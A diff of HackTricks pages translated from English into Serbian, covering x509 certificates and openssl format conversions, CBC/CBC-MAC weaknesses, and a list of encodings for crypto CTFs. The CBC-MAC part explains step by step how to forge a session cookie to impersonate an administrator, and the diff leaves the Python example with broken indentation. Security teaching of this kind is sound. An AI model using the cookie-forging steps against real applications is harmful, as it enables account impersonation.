-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+**Javni ključ sertifikat** je digitalni ID koji se koristi u kriptografiji da dokaže da neko poseduje javni ključ. Uključuje detalje o ključevi, identitet vlasnika (subjekt) i digitalni potpis od poverene vlasti (izdavača). Ako softver veruje izdavaču i potpis je validan, sigurna komunikacija sa vlasnikom ključa je moguća.
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+Sertifikati se uglavnom izdaju od strane [sertifikacionih tela](https://en.wikipedia.org/wiki/Certificate_authority) (CA) u [infrastrukturi javnog ključa](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) postavci. Druga metoda je [mreža poverenja](https://en.wikipedia.org/wiki/Web_of_trust), gde korisnici direktno verifikuju ključeve jedni drugih. Uobičajeni format za sertifikate je [X.509](https://en.wikipedia.org/wiki/X.509), koji se može prilagoditi specifičnim potrebama kako je navedeno u RFC 5280.
 
-## What is a Certificate
+## x509 Uobičajena Polja
 
-A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible.
+### **Uobičajena Polja u x509 Sertifikatima**
 
-Certificates are mostly issued by [certificate authorities](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) in a [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) setup. Another method is the [web of trust](https://en.wikipedia.org/wiki/Web_of_trust), where users directly verify each other’s keys. The common format for certificates is [X.509](https://en.wikipedia.org/wiki/X.509), which can be adapted for specific needs as outlined in RFC 5280.
+U x509 sertifikatima, nekoliko **polja** igra ključne uloge u obezbeđivanju validnosti i sigurnosti sertifikata. Evo pregleda ovih polja:
 
-## x509 Common Fields
+- **Broj Verzije** označava verziju x509 formata.
+- **Serijski Broj** jedinstveno identifikuje sertifikat unutar sistema Sertifikacione Vlasti (CA), uglavnom za praćenje opoziva.
+- **Subjekt** polje predstavlja vlasnika sertifikata, što može biti mašina, pojedinac ili organizacija. Uključuje detaljnu identifikaciju kao što su:
+- **Uobičajeno Ime (CN)**: Domeni pokriveni sertifikatom.
+- **Zemlja (C)**, **Lokacija (L)**, **Država ili Pokrajina (ST, S, ili P)**, **Organizacija (O)**, i **Organizaciona Jedinica (OU)** pružaju geografske i organizacione detalje.
+- **Istaknuto Ime (DN)** obuhvata punu identifikaciju subjekta.
+- **Izdavač** detaljno opisuje ko je verifikovao i potpisao sertifikat, uključujući slična podpolja kao Subjekt za CA.
+- **Period Validnosti** označen je **Ne Pre** i **Ne Posle** vremenskim oznakama, osiguravajući da sertifikat nije korišćen pre ili posle određenog datuma.
+- **Javni Ključ** sekcija, ključna za sigurnost sertifikata, specificira algoritam, veličinu i druge tehničke detalje javnog ključa.
+- **x509v3 ekstenzije** poboljšavaju funkcionalnost sertifikata, specificirajući **Korišćenje Ključa**, **Prošireno Korišćenje Ključa**, **Alternativno Ime Subjekta**, i druge osobine za fino podešavanje primene sertifikata.
 
-### **Common Fields in x509 Certificates**
-
-In x509 certificates, several **fields** play critical roles in ensuring the certificate's validity and security. Here's a breakdown of these fields:
-
-- **Version Number** signifies the x509 format's version.
-- **Serial Number** uniquely identifies the certificate within a Certificate Authority's (CA) system, mainly for revocation tracking.
-- The **Subject** field represents the certificate's owner, which could be a machine, an individual, or an organization. It includes detailed identification such as:
-  - **Common Name (CN)**: Domains covered by the certificate.
-  - **Country (C)**, **Locality (L)**, **State or Province (ST, S, or P)**, **Organization (O)**, and **Organizational Unit (OU)** provide geographical and organizational details.
-  - **Distinguished Name (DN)** encapsulates the full subject identification.
-- **Issuer** details who verified and signed the certificate, including similar subfields as the Subject for the CA.
-- **Validity Period** is marked by **Not Before** and **Not After** timestamps, ensuring the certificate is not used before or after a certain date.
-- The **Public Key** section, crucial for the certificate's security, specifies the algorithm, size, and other technical details of the public key.
-- **x509v3 extensions** enhance the certificate's functionality, specifying **Key Usage**, **Extended Key Usage**, **Subject Alternative Name**, and other properties to fine-tune the certificate's application.
-
-#### **Key Usage and Extensions**
-
-- **Key Usage** identifies cryptographic applications of the public key, like digital signature or key encipherment.
-- **Extended Key Usage** further narrows down the certificate's use cases, e.g., for TLS server authentication.
-- **Subject Alternative Name** and **Basic Constraint** define additional host names covered by the certificate and whether it's a CA or end-entity certificate, respectively.
-- Identifiers like **Subject Key Identifier** and **Authority Key Identifier** ensure uniqueness and traceability of keys.
-- **Authority Information Access** and **CRL Distribution Points** provide paths to verify the issuing CA and check certificate revocation status.
-- **CT Precertificate SCTs** offer transparency logs, crucial for public trust in the certificate.
+#### **Korišćenje Ključa i Ekstenzije**
 
+- **Korišćenje Ključa** identifikuje kriptografske primene javnog ključa, kao što su digitalni potpis ili enkripcija ključa.
+- **Prošireno Korišćenje Ključa** dodatno sužava slučajeve korišćenja sertifikata, npr. za TLS autentifikaciju servera.
+- **Alternativno Ime Subjekta** i **Osnovna Ograničenja** definišu dodatne nazive hostova pokrivene sertifikatom i da li je to CA ili sertifikat krajnjeg entiteta, respektivno.
+- Identifikatori kao što su **Identifikator Ključa Subjekta** i **Identifikator Ključa Vlasti** osiguravaju jedinstvenost i praćenje ključeva.
+- **Pristup Informacijama o Vlasti** i **Tačke Distribucije CRL** pružaju puteve za verifikaciju izdavača CA i proveru statusa opoziva sertifikata.
+- **CT Precertifikat SCTs** nude transparente dnevnike, što je ključno za javno poverenje u sertifikat.
 ```python
 # Example of accessing and using x509 certificate fields programmatically:
 from cryptography import x509
@@ -49,8 +40,8 @@ from cryptography.hazmat.backends import default_backend
 
 # Load an x509 certificate (assuming cert.pem is a certificate file)
 with open("cert.pem", "rb") as file:
-    cert_data = file.read()
-    certificate = x509.load_pem_x509_certificate(cert_data, default_backend())
+cert_data = file.read()
+certificate = x509.load_pem_x509_certificate(cert_data, default_backend())
 
 # Accessing fields
 serial_number = certificate.serial_number
@@ -63,133 +54,104 @@ print(f"Issuer: {issuer}")
 print(f"Subject: {subject}")
 print(f"Public Key: {public_key}")
 ```
+### **Razlika između OCSP i CRL distribucionih tačaka**
 
-### **Difference between OCSP and CRL Distribution Points**
+**OCSP** (**RFC 2560**) uključuje klijenta i odgovarača koji rade zajedno kako bi proverili da li je digitalni javni ključ sertifikat opozvan, bez potrebe za preuzimanjem celog **CRL**. Ova metoda je efikasnija od tradicionalnog **CRL**, koji pruža listu opozvanih serijskih brojeva sertifikata, ali zahteva preuzimanje potencijalno velikog fajla. CRL može sadržati do 512 unosa. Više detalja je dostupno [ovde](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm).
 
-**OCSP** (**RFC 2560**) involves a client and a responder working together to check if a digital public-key certificate has been revoked, without needing to download the full **CRL**. This method is more efficient than the traditional **CRL**, which provides a list of revoked certificate serial numbers but requires downloading a potentially large file. CRLs can include up to 512 entries. More details are available [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm).
+### **Šta je transparentnost sertifikata**
 
-### **What is Certificate Transparency**
+Transparentnost sertifikata pomaže u borbi protiv pretnji vezanih za sertifikate osiguravajući da je izdavanje i postojanje SSL sertifikata vidljivo vlasnicima domena, CA i korisnicima. Njeni ciljevi su:
 
-Certificate Transparency helps combat certificate-related threats by ensuring the issuance and existence of SSL certificates are visible to domain owners, CAs, and users. Its objectives are:
+- Sprečavanje CA da izdaju SSL sertifikate za domen bez znanja vlasnika domena.
+- Uspostavljanje otvorenog sistema revizije za praćenje greškom ili zlonamerno izdatih sertifikata.
+- Zaštita korisnika od prevarantskih sertifikata.
 
-- Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge.
-- Establishing an open auditing system for tracking mistakenly or maliciously issued certificates.
-- Safeguarding users against fraudulent certificates.
+#### **Sertifikati logovi**
 
-#### **Certificate Logs**
+Sertifikati logovi su javno revizibilni, samo za dodavanje zapisi sertifikata, koje održavaju mrežne usluge. Ovi logovi pružaju kriptografske dokaze za revizijske svrhe. Izdavaoci i javnost mogu podnositi sertifikate ovim logovima ili ih pretraživati radi verifikacije. Dok tačan broj log servera nije fiksiran, očekuje se da će biti manje od hiljadu globalno. Ove servere mogu nezavisno upravljati CA, ISP ili bilo koja zainteresovana strana.
 
-Certificate logs are publicly auditable, append-only records of certificates, maintained by network services. These logs provide cryptographic proofs for auditing purposes. Both issuance authorities and the public can submit certificates to these logs or query them for verification. While the exact number of log servers is not fixed, it's expected to be less than a thousand globally. These servers can be independently managed by CAs, ISPs, or any interested entity.
+#### **Upit**
 
-#### **Query**
+Da biste istražili logove transparentnosti sertifikata za bilo koji domen, posetite [https://crt.sh/](https://crt.sh).
 
-To explore Certificate Transparency logs for any domain, visit [https://crt.sh/](https://crt.sh).
+Postoje različiti formati za skladištenje sertifikata, svaki sa svojim slučajevima upotrebe i kompatibilnošću. Ovaj pregled pokriva glavne formate i pruža smernice za konvertovanje između njih.
 
-Different formats exist for storing certificates, each with its own use cases and compatibility. This summary covers the main formats and provides guidance on converting between them.
+## **Formati**
 
-## **Formats**
+### **PEM format**
 
-### **PEM Format**
+- Najšire korišćen format za sertifikate.
+- Zahteva odvojene fajlove za sertifikate i privatne ključeve, kodirane u Base64 ASCII.
+- Uobičajene ekstenzije: .cer, .crt, .pem, .key.
+- Primarno koriste Apache i slični serveri.
 
-- Most widely used format for certificates.
-- Requires separate files for certificates and private keys, encoded in Base64 ASCII.
-- Common extensions: .cer, .crt, .pem, .key.
-- Primarily used by Apache and similar servers.
+### **DER format**
 
-### **DER Format**
+- Binarni format sertifikata.
+- Nedostaju "BEGIN/END CERTIFICATE" izjave koje se nalaze u PEM fajlovima.
+- Uobičajene ekstenzije: .cer, .der.
+- Često se koristi sa Java platformama.
 
-- A binary format of certificates.
-- Lacks the "BEGIN/END CERTIFICATE" statements found in PEM files.
-- Common extensions: .cer, .der.
-- Often used with Java platforms.
+### **P7B/PKCS#7 format**
 
-### **P7B/PKCS#7 Format**
+- Skladišti se u Base64 ASCII, sa ekstenzijama .p7b ili .p7c.
+- Sadrži samo sertifikate i lance sertifikata, isključujući privatni ključ.
+- Podržava Microsoft Windows i Java Tomcat.
 
-- Stored in Base64 ASCII, with extensions .p7b or .p7c.
-- Contains only certificates and chain certificates, excluding the private key.
-- Supported by Microsoft Windows and Java Tomcat.
+### **PFX/P12/PKCS#12 format**
 
-### **PFX/P12/PKCS#12 Format**
+- Binarni format koji enkapsulira server sertifikate, međusertifikate i privatne ključeve u jednom fajlu.
+- Ekstenzije: .pfx, .p12.
+- Uglavnom se koristi na Windows-u za uvoz i izvoz sertifikata.
 
-- A binary format that encapsulates server certificates, intermediate certificates, and private keys in one file.
-- Extensions: .pfx, .p12.
-- Mainly used on Windows for certificate import and export.
+### **Konvertovanje formata**
 
-### **Converting Formats**
-
-**PEM conversions** are essential for compatibility:
+**PEM konverzije** su neophodne za kompatibilnost:
 
 - **x509 to PEM**
-
 ```bash
 openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
 ```
-
-- **PEM to DER**
-
+- **PEM u DER**
 ```bash
 openssl x509 -outform der -in certificatename.pem -out certificatename.der
 ```
-
-- **DER to PEM**
-
+- **DER u PEM**
 ```bash
 openssl x509 -inform der -in certificatename.der -out certificatename.pem
 ```
-
-- **PEM to P7B**
-
+- **PEM u P7B**
 ```bash
 openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer
 ```
-
-- **PKCS7 to PEM**
-
+- **PKCS7 u PEM**
 ```bash
 openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem
 ```
+**PFX konverzije** su ključne za upravljanje sertifikatima na Windows-u:
 
-**PFX conversions** are crucial for managing certificates on Windows:
-
-- **PFX to PEM**
-
+- **PFX u PEM**
 ```bash
 openssl pkcs12 -in certificatename.pfx -out certificatename.pem
 ```
-
-- **PFX to PKCS#8** involves two steps:
-  1. Convert PFX to PEM
-
+- **PFX to PKCS#8** uključuje dva koraka:
+1. Konvertujte PFX u PEM
 ```bash
 openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem
 ```
-
-2. Convert PEM to PKCS8
-
+2. Konvertujte PEM u PKCS8
 ```bash
 openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8
 ```
-
-- **P7B to PFX** also requires two commands:
-  1. Convert P7B to CER
-
+- **P7B to PFX** takođe zahteva dve komande:
+1. Konvertujte P7B u CER
 ```bash
 openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer
 ```
-
-2. Convert CER and Private Key to PFX
-
+2. Konvertujte CER i privatni ključ u PFX
 ```bash
 openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer
 ```
-
----
-
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+--- 
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/cryptography/cipher-block-chaining-cbc-mac-priv.md b/src/cryptography/cipher-block-chaining-cbc-mac-priv.md
index 47f1b2713..dde21fdf5 100644
--- a/src/cryptography/cipher-block-chaining-cbc-mac-priv.md
+++ b/src/cryptography/cipher-block-chaining-cbc-mac-priv.md
@@ -2,54 +2,54 @@
 
 # CBC
 
-If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie.
+Ako je **kolačić** **samo** **korisničko ime** (ili je prva deo kolačića korisničko ime) i želite da se pretvarate da ste korisnik "**admin**". Tada možete kreirati korisničko ime **"bdmin"** i **bruteforce**-ovati **prvi bajt** kolačića.
 
 # CBC-MAC
 
-**Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security.
+**Cipher block chaining message authentication code** (**CBC-MAC**) je metoda koja se koristi u kriptografiji. Funkcioniše tako što uzima poruku i šifruje je blok po blok, pri čemu je šifrovanje svakog bloka povezano sa prethodnim. Ovaj proces stvara **lanac blokova**, osiguravajući da će promena čak i jednog bita originalne poruke dovesti do nepredvidive promene u poslednjem bloku šifrovanih podataka. Da bi se izvršila ili obrnula takva promena, potrebna je šifrovana ključeva, čime se osigurava bezbednost.
 
-To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. The following figure sketches the computation of the CBC-MAC of a message comprising blocks![https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E:
+Da bi se izračunao CBC-MAC poruke m, šifruje se m u CBC režimu sa nultim inicijalizacionim vektorom i čuva se poslednji blok. Sledeća slika prikazuje izračunavanje CBC-MAC-a poruke koja se sastoji od blokova![https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) koristeći tajni ključ k i blok šifru E:
 
 ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png]()
 
-# Vulnerability
+# Ranljivost
 
-With CBC-MAC usually the **IV used is 0**.\
-This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So:
+Sa CBC-MAC obično je **IV koji se koristi 0**.\
+To je problem jer 2 poznate poruke (`m1` i `m2`) nezavisno će generisati 2 potpisa (`s1` i `s2`). Tako:
 
 - `E(m1 XOR 0) = s1`
 - `E(m2 XOR 0) = s2`
 
-Then a message composed by m1 and m2 concatenated (m3) will generate 2 signatures (s31 and s32):
+Tada poruka sastavljena od m1 i m2 konkateniranih (m3) će generisati 2 potpisa (s31 i s32):
 
 - `E(m1 XOR 0) = s31 = s1`
 - `E(m2 XOR s1) = s32`
 
-**Which is possible to calculate without knowing the key of the encryption.**
+**Što je moguće izračunati bez poznavanja ključa šifrovanja.**
 
-Imagine you are encrypting the name **Administrator** in **8bytes** blocks:
+Zamislite da šifrujete ime **Administrator** u **8 bajtnih** blokova:
 
 - `Administ`
 - `rator\00\00\00`
 
-You can create a username called **Administ** (m1) and retrieve the signature (s1).\
-Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\
-now, you can use s32 as the signature of the full name **Administrator**.
+Možete kreirati korisničko ime pod nazivom **Administ** (m1) i dobiti potpis (s1).\
+Zatim, možete kreirati korisničko ime koje je rezultat `rator\00\00\00 XOR s1`. Ovo će generisati `E(m2 XOR s1 XOR 0)` što je s32.\
+sada, možete koristiti s32 kao potpis punog imena **Administrator**.
 
-### Summary
+### Sažetak
 
-1. Get the signature of username **Administ** (m1) which is s1
-2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.**
-3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**.
+1. Dobijte potpis korisničkog imena **Administ** (m1) koji je s1
+2. Dobijte potpis korisničkog imena **rator\x00\x00\x00 XOR s1 XOR 0** je s32**.**
+3. Postavite kolačić na s32 i biće to validan kolačić za korisnika **Administrator**.
 
-# Attack Controlling IV
+# Napad Kontrolisanjem IV
 
-If you can control the used IV the attack could be very easy.\
-If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\
-Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**.
+Ako možete kontrolisati korišćeni IV, napad bi mogao biti vrlo lak.\
+Ako je kolačić samo korisničko ime šifrovano, da biste se pretvarali da ste korisnik "**administrator**" možete kreirati korisnika "**Administrator**" i dobićete njegov kolačić.\
+Sada, ako možete kontrolisati IV, možete promeniti prvi bajt IV-a tako da **IV\[0] XOR "A" == IV'\[0] XOR "a"** i regenerisati kolačić za korisnika **Administrator.** Ovaj kolačić će biti validan za **pretvaranje** korisnika **administrator** sa inicijalnim **IV**.
 
-## References
+## Reference
 
-More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
+Više informacija na [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/cryptography/crypto-ctfs-tricks.md b/src/cryptography/crypto-ctfs-tricks.md
index bb2b5f049..3cc84b024 100644
--- a/src/cryptography/crypto-ctfs-tricks.md
+++ b/src/cryptography/crypto-ctfs-tricks.md
@@ -25,7 +25,7 @@
 
 ## Encoders
 
-Most of encoded data can be decoded with these 2 ressources:
+Većina kodiranih podataka može se dekodirati pomoću ova 2 resursa:
 
 - [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
 - [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
@@ -33,7 +33,7 @@ Most of encoded data can be decoded with these 2 ressources:
 ### Substitution Autosolvers
 
 - [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
-- [https://quipqiup.com/](https://quipqiup.com) - Very good !
+- [https://quipqiup.com/](https://quipqiup.com) - Veoma dobro!
 
 #### Caesar - ROTx Autosolvers
 
@@ -45,95 +45,90 @@ Most of encoded data can be decoded with these 2 ressources:
 
 ### Base Encodings Autosolver
 
-Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
+Proverite sve ove baze sa: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
 
 - **Ascii85**
-  - `BQ%]q@psCd@rH0l`
+- `BQ%]q@psCd@rH0l`
 - **Base26** \[_A-Z_]
-  - `BQEKGAHRJKHQMVZGKUXNT`
+- `BQEKGAHRJKHQMVZGKUXNT`
 - **Base32** \[_A-Z2-7=_]
-  - `NBXWYYLDMFZGCY3PNRQQ====`
+- `NBXWYYLDMFZGCY3PNRQQ====`
 - **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
-  - `pbzsaamdcf3gna5xptoo====`
+- `pbzsaamdcf3gna5xptoo====`
 - **Base32 Geohash** \[_0-9b-hjkmnp-z_]
-  - `e1rqssc3d5t62svgejhh====`
+- `e1rqssc3d5t62svgejhh====`
 - **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_]
-  - `D1QPRRB3C5S62RVFDHGG====`
+- `D1QPRRB3C5S62RVFDHGG====`
 - **Base32 Extended Hexadecimal** \[_0-9A-V_]
-  - `D1NMOOB3C5P62ORFDHGG====`
+- `D1NMOOB3C5P62ORFDHGG====`
 - **Base45** \[_0-9A-Z $%\*+-./:_]
-  - `59DPVDGPCVKEUPCPVD`
+- `59DPVDGPCVKEUPCPVD`
 - **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_]
-  - `2yJiRg5BF9gmsU6AC`
+- `2yJiRg5BF9gmsU6AC`
 - **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_]
-  - `2YiHqF5bf9FLSt6ac`
+- `2YiHqF5bf9FLSt6ac`
 - **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
-  - `pyJ5RgnBE9gm17awU`
+- `pyJ5RgnBE9gm17awU`
 - **Base62** \[_0-9A-Za-z_]
-  - `g2AextRZpBKRBzQ9`
+- `g2AextRZpBKRBzQ9`
 - **Base64** \[_A-Za-z0-9+/=_]
-  - `aG9sYWNhcmFjb2xh`
+- `aG9sYWNhcmFjb2xh`
 - **Base67** \[_A-Za-z0-9-_.!\~\_]
-  - `NI9JKX0cSUdqhr!p`
+- `NI9JKX0cSUdqhr!p`
 - **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
-  - `BQ%]q@psCd@rH0l`
+- `BQ%]q@psCd@rH0l`
 - **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
-  - `<~BQ%]q@psCd@rH0l~>`
+- `<~BQ%]q@psCd@rH0l~>`
 - **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
-  - `Xm4y`V\_|Y(V{dF>\`
+- `Xm4y`V\_|Y(V{dF>\`
 - **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
-  - `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
+- `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
 - **Base85 (XML)** \[\_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\_\_]
-  - `Xm4y|V{~Y+V}dF?`
+- `Xm4y|V{~Y+V}dF?`
 - **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
-  - `frDg[*jNN!7&BQM`
+- `frDg[*jNN!7&BQM`
 - **Base100** \[]
-  - `👟👦👣👘👚👘👩👘👚👦👣👘`
+- `👟👦👣👘👚👘👩👘👚👦👣👘`
 - **Base122** \[]
-  - `4F ˂r0Xmvc`
+- `4F ˂r0Xmvc`
 - **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
-  - `MIc3KiXa+Ihz+lrXMIc3KbCC`
+- `MIc3KiXa+Ihz+lrXMIc3KbCC`
 - **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
-  - `DmPsv8J7qrlKEoY7`
+- `DmPsv8J7qrlKEoY7`
 - **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
-  - `kLD8iwKsigSalLJ5`
+- `kLD8iwKsigSalLJ5`
 - **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
-  - `ayRiIo1gpO+uUc7g`
+- `ayRiIo1gpO+uUc7g`
 - **ESAB46** \[]
-  - `3sHcL2NR8WrT7mhR`
+- `3sHcL2NR8WrT7mhR`
 - **MEGAN45** \[]
-  - `kLD8igSXm2KZlwrX`
+- `kLD8igSXm2KZlwrX`
 - **TIGO3FX** \[]
-  - `7AP9mIzdmltYmIP9mWXX`
+- `7AP9mIzdmltYmIP9mWXX`
 - **TRIPO5** \[]
-  - `UE9vSbnBW6psVzxB`
+- `UE9vSbnBW6psVzxB`
 - **FERON74** \[]
-  - `PbGkNudxCzaKBm0x`
+- `PbGkNudxCzaKBm0x`
 - **GILA7** \[]
-  - `D+nkv8C1qIKMErY1`
+- `D+nkv8C1qIKMErY1`
 - **Citrix CTX1** \[]
-  - `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
+- `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
 
 [http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
 
 ### HackerizeXS \[_╫Λ↻├☰┏_]
-
 ```
 ╫☐↑Λ↻Λ┏Λ↻☐↑Λ
 ```
-
-- [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
+- [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Mrtav: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
 
 ### Morse
-
 ```
 .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
 ```
-
-- [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
+- [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Mrtav: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
 
 ### UUencoder
-
 ```
 begin 644 webutils_pl
 M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(
@@ -142,98 +137,81 @@ F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$`
 `
 end
 ```
-
 - [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
 
 ### XXEncoder
-
 ```
 begin 644 webutils_pl
 hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236
 5Hol-G2xAEE++
 end
 ```
-
 - [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
 
 ### YEncoder
-
 ```
 =ybegin line=128 size=28 name=webutils_pl
 ryvkryvkryvkryvkryvkryvkryvk
 =yend size=28 crc32=35834c86
 ```
-
 - [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)
 
 ### BinHex
-
 ```
 (This file must be converted with BinHex 4.0)
 :#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p
 -38K26%'d9J!!:
 ```
-
 - [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
 
 ### ASCII85
-
 ```
 <~85DoF85DoF85DoF85DoF85DoF85DoF~>
 ```
-
 - [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85)
 
-### Dvorak keyboard
-
+### Dvorak tastatura
 ```
 drnajapajrna
 ```
-
 - [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard)
 
 ### A1Z26
 
-Letters to their numerical value
-
+Slova do njihove numeričke vrednosti
 ```
 8 15 12 1 3 1 18 1 3 15 12 1
 ```
